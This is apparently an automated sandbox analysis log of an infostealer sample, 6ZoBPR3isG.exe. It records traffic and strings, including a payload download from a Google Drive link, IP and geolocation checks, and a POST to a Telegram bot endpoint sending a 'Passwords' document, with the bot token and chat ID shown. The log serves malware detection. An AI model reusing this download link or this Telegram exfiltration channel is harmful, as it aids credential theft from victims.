            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.3:49980 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: drive.google.com
            Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd319443444d0bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndn
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2645850527.00000000369D0000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2645927513.0000000036A6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/M
            Source: 6ZoBPR3isG.exe, 00000003.00000003.2361992103.0000000036A51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/U
            Source: 6ZoBPR3isG.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034131000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000341F7000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034470000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003420D000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342EF000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003433A000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000344B9000.00000004.00000800.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org.S
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.000000003418C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.00000000342D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034545000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgL
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003DAB000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000002.2621340105.0000000003D37000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1770546825.0000000003DAD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1C_FIUBUbXxo5lMNTlwG535Op9uD8rNbe&export=download&
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: 6ZoBPR3isG.exe, 00000003.00000002.2643502493.0000000034161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: 6ZoBPR3isG.exe, 00000003.00000003.1732582963.0000000003DB1000.00000004.00000020.00020000.00000000.sdmp, 6ZoBPR3isG.exe, 00000003.00000003.1732514543.0000000003DA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
            Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50058
            Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
            Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
